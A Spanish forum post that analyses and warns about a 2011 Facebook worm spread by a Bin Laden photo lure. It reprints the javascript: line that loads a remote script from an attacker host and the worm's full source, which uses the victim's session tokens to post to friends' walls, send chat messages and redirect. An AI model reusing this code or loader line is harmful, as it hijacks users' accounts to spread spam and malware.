En 10 minutos, tuvo seguro 30.000 seguidores la página!
Muy simple. Estaba en facebook cuando un amigo (uno solo por ahora) me "habló" sobre una foto de Bin Laden muerto.
Más precisamente, algo así:
dijo:See a picture of bin laden dead! ?
No, mi amigo no habla inglés. Vive aca en Buenos Aires y es bien porteño.
Qué hice? Al toque hice click en el link. Llegué a una página de facebook, que llevaba a un marco externo y mostraba una capa con un estilo similar al de una alerta de facebook. El contenido, fíjense, también en inglés.
Al aceptar esa "alerta", se selecciona el texto
dijo:javascript:(a=(b=document).createElement('script')).src='//themafiafamily.net/bin/bl.js',b.body.appendChild(a);void(0)
sintaxis idéntica a la de espíaface. Este script lleva al directorio: http://themafiafamily.net/bin/bl.js, y acá, sin ofuscación, sin un carajo, de hecho, con comentarios del autor, tienen el script.
Hice como nanopene (no porque él lo haya hecho, sino porque yo lo hacía de antes: ver cómo funcionan las páginas que visito a diario), y leí el código javascript.
dijo:///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KuNG FU JS v.1 20yrsplus.info
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
//alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');
/**
 * Look up a cookie by name in `document.cookie`.
 *
 * Only cookies that the browser exposes to page scripts appear in
 * `document.cookie`; cookies flagged HttpOnly are not readable here.
 *
 * @param {string} name - Cookie name to search for.
 * @returns {string|null} The text after "name=" for the first matching
 *   entry, or null when no entry starts with that prefix.
 */
function readCookie(name) {
const prefix = name + "=";
for (const rawEntry of document.cookie.split(';')) {
// Entries are separated by "; ", so drop the leading spaces before comparing.
const entry = rawEntry.replace(/^ +/, '');
if (entry.startsWith(prefix)) {
return entry.slice(prefix.length);
}
}
return null;
}
// Value of the "c_user" cookie; it is sent below as the viewer/user id in the
// friend-list and buddy-list requests.
var user_id = readCookie("c_user" );
// Setup some variables
// Both values are read from form fields that already exist in the page the
// script was pasted into, and both are attached to every POST further down.
// NOTE(review): presumably these are the site's per-session request tokens;
// the script can read them only because it executes inside that page.
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
// Multiple URL Shorteners
// In this sample both entries are the same URL, so the random pick below
// always yields that one link.
var shortArray = new Array(
"http://www.facebook.com/picofbinladendead",
"http://www.facebook.com/picofbinladendead"
);
var shortUrl = shortArray[Math.floor(shortArray.length*Math.random())];
// Chat message variables
// The lure text matches the chat message quoted at the top of the post;
// it is URL-encoded once here and reused for every chat recipient.
var this_chat = "See a picture of bin laden dead! "+shortUrl+"?";
var prepared_chat = encodeURIComponent(this_chat);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Post Link to friends walls
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Stage 1 of the propagation: fetch the viewer's friend list, then post the
// lure link to the wall of up to 400 of the returned entries.
// NOTE(review): several statements in this listing are missing a closing ")"
// (the two lines of the replace() call, both quoted setRequestHeader calls) and
// the long parameter string is split across two lines, so the code does not
// parse as printed; this looks like damage from the forum's rendering.
var token = Math.round(new Date().getTime() / 1000);
var http1 = new XMLHttpRequest();
var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";
var params1 = "";
// params1 is empty, so this only appends a second "?" to a URL that already
// has a query string.
http1.open("GET", url1+"?"+params1, true);
http1.onreadystatechange = function() {//Call a function when the state changes.
if(http1.readyState == 4 && http1.status == 200) { // If state = success
var response1 = http1.responseText;
// The response text starts with a "for (;;" prefix that is removed before
// the remainder is handed to JSON.parse.
response1 = response1.replace("for (;;", ""
; // Get rid of the junk at the beginning of the returned object
response1 = JSON.parse(response1); // Convert the response to JSON
//alert(response4.toSource());
var count = 0;
// The loop key `uid` is never used (and is an implicit global); entries are
// addressed through `count` instead.
for(uid in response1.payload.entries){
if(count < 400){
//alert("SENT TO "+response1.payload.entries[count].uid);
// Loop to send messages
// New XMLHttp object
var httpwp = new XMLHttpRequest();
var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
// Fixed lure content for the wall post. These strings are good indicators
// when searching logs or reports for this campaign.
var statusmessage="This will leave you speechless";
var title="See picture of bin laden dead!";
var link="http://www.facebook.com/picofbinladendead";
var description="First released picture of bin laden dead! ";
var picture="http://dl.dropbox.com/u/3730110/laden.png";
// Form body of the wall post: the page's own post_form_id/fb_dtsg values, the
// target friend's uid (xhpc_targetid) and a hand-built link attachment.
// Unlike prepared_chat, title/link/description/picture are concatenated
// without encodeURIComponent.
var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url ]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+"&xhpc_message="+statusmessage+"
&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
httpwp.open("POST", urlwp, true);
//Send the proper header information along with the request
httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded";
httpwp.setRequestHeader("Content-length", paramswp.length);
httpwp.setRequestHeader("Connection", "keep-alive";
// The response handler is empty: the script does not check whether a post
// succeeded.
httpwp.onreadystatechange = function() { //Call a function when the state changes.
if(httpwp.readyState == 4 && httpwp.status == 200){
//alert(http.responseText);
//alert('buddy list fetched');
}
}
httpwp.send(paramswp);
}
count++; // increment counter
}
// Bare property reference, not a call; this statement has no effect.
http1.close; // Close the connection
}
}
http1.send(null);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Hide chat boxes
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Sets display:none on the element with id 'fbDockChatTabSlider'.
// NOTE(review): per the section header this is the chat dock; presumably it is
// hidden so the user does not see the chat messages sent in the next section.
var hide = document.getElementById('fbDockChatTabSlider');
hide.style.display = "none";
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Get online friends and send chat message to them
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Stage 2 of the propagation: request the chat buddy list and send the
// prepared lure message to up to 100 of the contacts listed as available.
// NOTE(review): as in the wall-post section, the replace() call and the quoted
// setRequestHeader calls are missing a closing ")" as printed; probably
// damage from the forum's rendering.
var http3 = new XMLHttpRequest();
var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
// The request carries the user id from the cookie plus the two form values
// read from the page.
var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
http3.open("POST", url3, true);
//Send the proper header information along with the request
http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded";
http3.setRequestHeader("Content-length", params3.length);
http3.setRequestHeader("Connection", "close";
http3.onreadystatechange = function() {//Call a function when the state changes.
if(http3.readyState == 4 && http3.status == 200) {
var response3 = http3.responseText;
// Same "for (;;" prefix removal as in the friend-list request, then JSON.parse.
response3 = response3.replace("for (;;", ""
;
response3 = JSON.parse(response3);
var count = 0;
// Each key of nowAvailableList is used directly as the recipient ("to=").
for(property in response3.payload.buddy_list.nowAvailableList){
if(count < 100){
// Loop to send messages
// New XMLHttp object
var httpc = new XMLHttpRequest();
// Generate random message ID
var msgid = Math.floor(Math.random()*1000000);
var time = Math.round(new Date().getTime() / 1000);
var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
// msg_text is the URL-encoded lure built at the top of the script, so every
// recipient receives the identical message.
var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
httpc.open("POST", urlc, true);
//Send the proper header information along with the request
httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded";
httpc.setRequestHeader("Content-length", paramsc.length);
httpc.setRequestHeader("Connection", "close";
// Empty handler: the result of the send is ignored.
httpc.onreadystatechange = function() { //Call a function when the state changes.
if(httpc.readyState == 4 && httpc.status == 200){
//alert(http.responseText);
//alert('buddy list fetched');
}
}
httpc.send(paramsc);
}
//alert(property);
count++; // increment counter
}
// Bare property reference, not a call; this statement has no effect.
http3.close; // Close the connection
}
}
http3.send(params3);
/*
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIVEAWAY
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http4 = new XMLHttpRequest();
var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var params4 = "fbpage_id=112580802159800&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
http4.open("POST", url4, true);
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded";
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close";
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
http4.close; // Close the connection
}
}
http4.send(params4);
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
// Become a Fan - MW GIft
///////////////////////////////////////////////////////////////////////////////////////////////////////////////
var http5 = new XMLHttpRequest();
var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
var params5 = "fbpage_id=112580802159800&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
http5.open("POST", url5, true);
//Send the proper header information along with the request
http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded";
http5.setRequestHeader("Content-length", params5.length);
http5.setRequestHeader("Connection", "close";
http5.onreadystatechange = function() {//Call a function when the state changes.
if(http5.readyState == 4 && http5.status == 200) {
http5.close; // Close the connection
}
}
http5.send(params5);
*/
// Final step. The two "Become a Fan" sections directly above sit inside a
// /* ... */ comment, so they do not run in this version of the script.
//document.getElementById('susta').style.display="none";
// Replaces the page's content area with a spinner image and "Please wait...".
// As printed, the inner double quotes around the image URL end the string
// early, so this line does not parse as shown.
document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src="http://www.hindustantimes.com/images/loading_gif.gif" /><br />Please wait...</center>";
// After 15000 ms the browser is sent to a page on the script's own host.
// The string form of setTimeout is evaluated as code when the timer fires.
setTimeout("window.location = 'http://themafiafamily.net/bin/search.php';", 15000);
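Lo que hace este es simplísimo: pega un link en el muro de algunos amigos tuyos, lo envía por chat, y te hace fan de dos páginas (creo que ya no existen; en el listado de arriba esa parte aparece comentada, entre /* y */). Por último, y como espíaface, te redirecciona a otra página (la search.php de la última línea del script), donde ahí también pasa lo mismo: tenés 3 anuncios y ...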
LO ÚNICO!
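tengan cuidado con la función readCookie(): por ahora lo único que hace es sacar tu uid (identificador de usuario de facebook), pero quién sabe si, en un abrir y cerrar de ojos, la guarda en un archivo externo, con sesión y todo (quédense tranquilos igual, facebook debe comprobar cookie con ip). Eso sí: el script no necesita llevarse la cookie para actuar en tu nombre, porque corre dentro de la misma página de facebook, con tu sesión abierta, y usa los valores post_form_id y fb_dtsg que saca del formulario.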
EL TEMA DE MI RANGO DE USUARIO, NO SE MENCIONA EN LOS COMENTARIOS.
